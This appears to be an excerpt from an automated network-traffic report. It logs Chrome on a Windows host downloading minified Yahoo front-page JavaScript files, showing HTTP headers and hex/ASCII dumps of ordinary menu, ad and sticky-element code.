                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 28 76 6f 69 64 20 30 3d 3d 3d 6f 29 7b 76 61 72 20 69 3d 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 69 3f 76 6f 69 64 20 30 3a 65 28 69 2c 6e 2c 72 29 7d 69 66 28 22 76 61 6c 75 65 22 69 6e 20 6f 29 72 65 74 75 72 6e 20 6f 2e 76 61 6c 75 65 3b 76 61 72 20 61 3d 6f 2e 67 65 74 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 61 29 72 65 74 75 72 6e 20 61 2e 63 61 6c 6c 28 72 29 7d 2c 76 3d 77 69 6e 64 6f 77 2e 77 61 66 65 72 2c 70 3d 76 2e 62 61 73 65 2c 6d 3d 76 2e 63 6f 6e 73 74 61 6e 74 73 2c 64 3d 76 2e 57 61 66 65 72 42 61 73 65 43 6c 61 73 73 2c 68 3d 76 2e 75 74 69 6c 73 2c 79 3d 68 2e 63 6f 6e 76 65 72 74 4e 6f 64 65 4c 69 73 74 54 6f 41 72 72 61 79 2c 62 3d 68 2e 66 69 6e 64 41 6e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: (void 0===o){var i=Object.getPrototypeOf(t);return null===i?void 0:e(i,n,r)}if("value"in o)return o.value;var a=o.get;if(void 0!==a)return a.call(r)},v=window.wafer,p=v.base,m=v.constants,d=v.WaferBaseClass,h=v.utils,y=h.convertNodeListToArray,b=h.findAnc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 65 22 2c 22 6d 65 6e 75 69 74 65 6d 22 29 7d 29 3b 76 61 72 20 70 3d 69 2e 69 64 3b 70 26 26 73 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 22 2c 70 29 3b 76 61 72 20 6d 3d 73 2e 69 64 3b 72 65 74 75 72 6e 20 6d 26 26 69 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 22 2c 6d 29 2c 6e 7d 72 65 74 75 72 6e 20 69 28 74 2c 65 29 2c 63 28 74 2c 5b 7b 6b 65 79 3a 22 6f 70 65 6e 4d 65 6e 75 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2c 74 3d 74 68 69 73 2e 5f 75 74 69 6c 2c 6e 3d 74 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: e","menuitem")});var p=i.id;p&&s.setAttribute("aria-controls",p);var m=s.id;return m&&i.setAttribute("aria-labelledby",m),n}return i(t,e),c(t,[{key:"openMenu",value:function(){var e=arguments.length>0&&void 0!==arguments[0]&&arguments[0],t=this._util,n=t.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 6f 74 6f 74 79 70 65 4f 66 28 74 2e 70 72 6f 74 6f 74 79 70 65 29 2c 22 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 22 2c 74 68 69 73 29 2e 63 61 6c 6c 28 74 68 69 73 29 7d 7d 2c 7b 6b 65 79 3a 22 6d 65 6e 75 43 6c 69 63 6b 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 5f 75 74 69 6c 2c 6e 3d 74 2e 6f 70 74 69 6f 6e 73 45 6c 65 6d 2c 72 3d 74 2e 63 6c 6f 73 65 4f 6e 53 65 6c 65 63 74 2c 6f 3d 65 2e 65 76 65 6e 74 54 61 72 67 65 74 3b 79 28 6e 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 6d 65 6e 75 2d 69 74 65 6d 2d 61 63 74 69 76 65 22 29 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 6d 65 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ototypeOf(t.prototype),"addEventListeners",this).call(this)}},{key:"menuClick",value:function(e){var t=this._util,n=t.optionsElem,r=t.closeOnSelect,o=e.eventTarget;y(n.getElementsByClassName("menu-item-active")).forEach(function(e){e.classList.remove("men
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 2e 6c 65 6e 67 74 68 29 3b 76 61 72 20 69 3d 72 5b 6f 2d 31 5d 3b 28 67 28 69 29 5b 30 5d 7c 7c 69 29 2e 66 6f 63 75 73 28 29 7d 7d 7d 2c 7b 6b 65 79 3a 22 6d 6f 75 73 65 4f 76 65 72 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 74 68 69 73 2e 5f 73 74 61 74 65 2e 61 63 74 69 76 65 29 7b 74 68 69 73 2e 5f 75 74 69 6c 2e 73 68 6f 75 6c 64 41 63 74 69 76 61 74 65 4f 6e 48 6f 76 65 72 26 26 74 68 69 73 2e 6f 70 65 6e 4d 65 6e 75 28 21 30 29 7d 7d 7d 2c 7b 6b 65 79 3a 22 6d 6f 75 73 65 4c 65 61 76 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 74 68 69 73 2e 5f 73 74 61 74 65 2e 61 63 74 69 76 65 29 7b 74 68 69 73 2e 5f 75 74 69 6c 2e 73 68 6f 75 6c 64 41 63 74 69 76 61 74 65 4f 6e 48 6f 76 65 72 26 26 74 68 69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: .length);var i=r[o-1];(g(i)[0]||i).focus()}}},{key:"mouseOver",value:function(){if(!this._state.active){this._util.shouldActivateOnHover&&this.openMenu(!0)}}},{key:"mouseLeave",value:function(e){if(this._state.active){this._util.shouldActivateOnHover&&thi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC556INData Raw: 79 70 65 4f 66 28 74 29 29 2e 63 61 6c 6c 28 74 68 69 73 2c 7b 72 6f 6f 74 3a 69 2c 73 65 6c 65 63 74 6f 72 3a 75 2c 57 61 66 65 72 43 6c 61 73 73 3a 6a 7d 29 29 2c 63 3d 6c 3b 72 65 74 75 72 6e 20 6a 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 6f 73 65 4f 74 68 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 65 6c 65 6d 2c 74 3d 63 2e 5f 73 74 61 74 65 2e 65 6c 65 6d 65 6e 74 49 6e 73 74 61 6e 63 65 73 2c 6e 3d 21 30 2c 72 3d 21 31 2c 6f 3d 76 6f 69 64 20 30 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 69 2c 61 3d 74 2e 65 6e 74 72 69 65 73 28 29 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 28 29 3b 21 28 6e 3d 28 69 3d 61 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 3b 6e 3d 21 30 29 7b 76 61 72 20 73 3d 69 2e 76
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ypeOf(t)).call(this,{root:i,selector:u,WaferClass:j})),c=l;return j.prototype.closeOthers=function(){var e=this._util.elem,t=c._state.elementInstances,n=!0,r=!1,o=void 0;try{for(var i,a=t.entries()[Symbol.iterator]();!(n=(i=a.next()).done);n=!0){var s=i.v


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              133192.168.2.45115787.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC585OUTGET /aaq/fp/js/react-wafer-stream.custom.modern.1ed4fe71b1fc647ddbf37a7050944309.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC762INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: 2hLJ7VkF50IXcKULoaKlM0zQDGaV+UUWJa8js9xXZ0HsbYv+iWM+V0FuQHkkyXLIFMVzkIjIBrjRNkAulQwEwd1SObW8OVbs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: WX7EPY01KHVD5Q49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 02:00:50 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Sat, 02 Dec 2023 00:17:32 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "1ed4fe71b1fc647ddbf37a7050944309"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: xy7lqotFC.zmCqihzzE4iOckpJX.wEX6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 8254
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 61976
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 77 69 6e 64 6f 77 2e 77 61 66 65 72 26 26 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 72 65 61 64 79 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 22 73 68 6f 77 2d 64 72 61 77 65 72 22 2c 74 3d 6e 75 6c 6c 2c 61 3d 6e 75 6c 6c 2c 72 3d 22 77 61 66 65 72 2d 66 65 74 63 68 2d 65 72 72 6f 72 22 2c 69 3d 22 77 61 66 65 72 2d 66 65 74 63 68 2d 63 6f 6d 70 6c 65 74 65 22 2c 6e 3d 22 73 74 72 65 61 6d 2d 72 65 6c 61 74 65 64 2d 64 72 61 77 65 72 22 2c 6f 3d 22 53 74 72 65 61 6d 52 65 6c 61 74 65 64 22 2c 73 3d 22 72 65 61 63 74 2d 77 61 66 65 72 2d 73 74 72 65 61 6d 22 2c 63 3d 22 6a 73 6f 6e 22 2c 64 3d 22 77 61 66 65 72 2d 66 65 74 63 68 22 2c 6c 3d 22 73 74 72 65 61 6d 2d 75 75 69 64 2d 6c 69 73 74 22 2c 75 3d 5b 5d 2c 77 3d 64 6f 63 75 6d 65 6e 74 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: window.wafer&&window.wafer.ready((function(){var e="show-drawer",t=null,a=null,r="wafer-fetch-error",i="wafer-fetch-complete",n="stream-related-drawer",o="StreamRelated",s="react-wafer-stream",c="json",d="wafer-fetch",l="stream-uuid-list",u=[],w=document.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 52 65 61 64 65 72 2d 6f 70 65 6e 22 29 2c 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 62 61 73 65 2e 6c 6f 63 6b 28 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 4d 61 69 6e 56 69 65 77 22 29 29 2c 77 69 6e 64 6f 77 2e 73 63 72 6f 6c 6c 54 6f 28 30 2c 30 29 29 2c 74 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 73 74 72 65 61 6d 2d 62 61 74 63 68 2d 66 65 74 63 68 22 29 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 6a 73 2d 64 69 73 70 6c 61 79 2d 63 61 72 64 20 75 6e 70 72 6f 63 65 73 73 65 64 2d 64 69 73 70 6c 61 79 2d 63 61 72 64 22 29 3b 61 2e 6c 65 6e 67 74 68 26 26
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Element.classList.add("Reader-open"),window.wafer.base.lock(document.getElementById("MainView")),window.scrollTo(0,0)),t.classList.contains("stream-batch-fetch")){var a=document.getElementsByClassName("js-display-card unprocessed-display-card");a.length&&
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 77 69 6e 64 6f 77 2e 44 41 52 4c 41 2e 61 64 64 50 6f 73 28 6f 29 3b 76 61 72 20 73 3d 6e 65 77 20 77 69 6e 64 6f 77 2e 44 41 52 4c 41 2e 52 65 73 70 6f 6e 73 65 28 22 52 45 53 45 52 56 45 4d 4f 4d 45 4e 54 53 22 2c 7b 7d 29 3b 69 3d 75 6e 65 73 63 61 70 65 28 69 29 2c 73 2e 61 64 64 28 22 52 45 53 45 52 56 45 4d 4f 4d 45 4e 54 53 22 2c 69 29 2c 77 69 6e 64 6f 77 2e 44 41 52 4c 41 2e 72 65 6e 64 65 72 28 73 29 7d 7d 7d 3b 66 75 6e 63 74 69 6f 6e 20 4c 28 29 7b 41 2e 63 6f 6e 76 65 72 74 4e 6f 64 65 4c 69 73 74 54 6f 41 72 72 61 79 28 77 29 2e 66 69 6c 74 65 72 28 28 65 3d 3e 21 65 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 69 6e 69 74 2d 76 69 73 69 74 65 64 22 29 29 29 2e 66 6f 72 45 61 63 68 28 28 6c 3d 3e 7b 6c 2e 63 6c 61 73 73 4c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: window.DARLA.addPos(o);var s=new window.DARLA.Response("RESERVEMOMENTS",{});i=unescape(i),s.add("RESERVEMOMENTS",i),window.DARLA.render(s)}}};function L(){A.convertNodeListToArray(w).filter((e=>!e.classList.contains("init-visited"))).forEach((l=>{l.classL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 72 20 70 3d 53 28 29 2c 76 3d 77 69 6e 64 6f 77 2e 59 41 48 4f 4f 26 26 77 69 6e 64 6f 77 2e 59 41 48 4f 4f 2e 63 6f 6e 74 65 78 74 7c 7c 7b 7d 2c 4c 3d 7b 63 6f 6e 66 69 67 3a 7b 6c 65 61 64 49 74 65 6d 55 75 69 64 3a 67 7c 7c 66 7d 2c 63 74 72 6c 3a 6f 2c 6c 61 6e 67 3a 76 2e 6c 61 6e 67 2c 6d 5f 69 64 3a 73 2c 6d 5f 6d 6f 64 65 3a 63 2c 72 65 67 69 6f 6e 3a 76 2e 72 65 67 69 6f 6e 2c 73 69 74 65 3a 76 2e 73 69 74 65 7d 3b 63 6f 6e 73 74 20 6e 3d 76 2e 70 61 72 74 6e 65 72 2c 6c 3d 7b 64 65 64 75 70 55 75 69 64 73 3a 70 2e 64 65 64 75 70 55 75 69 64 73 2e 6a 6f 69 6e 28 22 2c 22 29 2c 75 75 69 64 3a 66 7d 3b 76 61 72 20 45 3d 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 63 66 67 22 29 3b 69 66 28 45 29 7b 76 61 72 20 68 3d 6d 2e 67 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: r p=S(),v=window.YAHOO&&window.YAHOO.context||{},L={config:{leadItemUuid:g||f},ctrl:o,lang:v.lang,m_id:s,m_mode:c,region:v.region,site:v.site};const n=v.partner,l={dedupUuids:p.dedupUuids.join(","),uuid:f};var E=a.getAttribute("data-cfg");if(E){var h=m.ge
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 26 41 2e 63 6f 6e 76 65 72 74 4e 6f 64 65 4c 69 73 74 54 6f 41 72 72 61 79 28 4c 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 67 26 26 65 3f 70 28 65 29 3a 65 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 6e 6f 6e 65 22 7d 29 29 7d 29 29 7d 69 66 28 77 26 26 77 2e 6c 65 6e 67 74 68 29 7b 4c 28 29 3b 76 61 72 20 45 2c 68 2c 79 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 73 63 72 6f 6c 6c 61 62 6c 65 2d 73 6d 61 64 22 29 2c 4e 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 73 63 72 6f 6c 6c 61 62 6c 65 2d 76 69 64 65 6f 22 29 2c 52 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 48 65 69 67 68 74 7c 7c 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: &A.convertNodeListToArray(L).forEach((function(e){g&&e?p(e):e.style.display="none"}))}))}if(w&&w.length){L();var E,h,y=document.getElementById("scrollable-smad"),N=document.getElementById("scrollable-video"),R=window.innerHeight||document.documentElement.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 28 71 28 62 2e 71 75 61 72 74 69 6c 65 41 63 74 69 6f 6e 55 72 6c 37 35 29 2c 7b 75 73 65 4e 61 76 69 67 61 74 6f 72 3a 21 31 7d 29 2c 62 2e 71 75 61 72 74 69 6c 65 41 63 74 69 6f 6e 55 72 6c 37 35 3d 6e 75 6c 6c 29 3a 61 3e 3d 35 30 26 26 62 2e 71 75 61 72 74 69 6c 65 41 63 74 69 6f 6e 55 72 6c 35 30 3f 28 41 2e 66 69 72 65 42 65 61 63 6f 6e 28 71 28 62 2e 71 75 61 72 74 69 6c 65 41 63 74 69 6f 6e 55 72 6c 35 30 29 2c 7b 75 73 65 4e 61 76 69 67 61 74 6f 72 3a 21 31 7d 29 2c 62 2e 71 75 61 72 74 69 6c 65 41 63 74 69 6f 6e 55 72 6c 35 30 3d 6e 75 6c 6c 29 3a 61 3e 3d 32 35 26 26 62 2e 71 75 61 72 74 69 6c 65 41 63 74 69 6f 6e 55 72 6c 32 35 3f 28 41 2e 66 69 72 65 42 65 61 63 6f 6e 28 71 28 62 2e 71 75 61 72 74 69 6c 65 41 63 74 69 6f 6e 55 72 6c 32 35 29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: (q(b.quartileActionUrl75),{useNavigator:!1}),b.quartileActionUrl75=null):a>=50&&b.quartileActionUrl50?(A.fireBeacon(q(b.quartileActionUrl50),{useNavigator:!1}),b.quartileActionUrl50=null):a>=25&&b.quartileActionUrl25?(A.fireBeacon(q(b.quartileActionUrl25)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC454INData Raw: 26 65 2e 65 6c 65 6d 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 73 74 72 65 61 6d 2d 76 69 64 65 6f 2d 61 64 2d 76 32 22 29 26 26 65 2e 65 6c 65 6d 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 76 69 64 65 6f 2d 65 6e 64 63 61 72 64 22 29 7d 29 29 3b 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 6f 6e 28 22 74 6f 67 67 6c 65 3a 63 68 61 6e 67 65 22 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 65 26 26 65 2e 6d 65 74 61 26 26 65 2e 65 6c 65 6d 29 7b 76 61 72 20 74 3d 65 2e 65 6c 65 6d 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 77 66 2d 74 6f 67 67 6c 65 2d 74 61 72 67 65 74 22 29 3b 22 73 68 6f 77 2d 64 72 61 77 65 72 22 3d 3d 3d 65 2e 6d 65 74 61 2e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: &e.elem.parentNode.classList.contains("stream-video-ad-v2")&&e.elem.parentNode.classList.add("video-endcard")}));window.wafer.on("toggle:change",(function(e){if(e&&e.meta&&e.elem){var t=e.elem.getAttribute("data-wf-toggle-target");"show-drawer"===e.meta.c


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              134192.168.2.45115987.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC539OUTGET /aaq/wf/wf-sticky-1.2.6-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC743INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: PB0mp4vXPpbTJI1KqgzBjoTsjv1NYdOa8ceaJ2LDtyftCwfBtAqt1b834oe+w7/yjrGgpaFob1Q=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: FJMD98KYCW67EXPJ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Mon, 07 Oct 2024 06:33:23 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 26 Jan 2024 23:41:32 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "446c3635a0812f8c988a5e9ca3fc96a2"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: wePfh.HucUka1ChhR.5WzprFG1GPno6V
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 8787
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 132022
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 73 74 69 63 6b 79 22 2c 5b 5d 2c 65 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 73 74 69 63 6b 79 22 5d 3d 65 28 29 3a 28 74 2e 77 61 66 65 72 3d 74 2e 77 61 66 65 72 7c 7c 7b 7d 2c 74 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 74 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(t,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define("wafer-sticky",[],e):"object"==typeof exports?exports["wafer-sticky"]=e():(t.wafer=t.wafer||{},t.wafer.wafers=t.wafer.wafers||
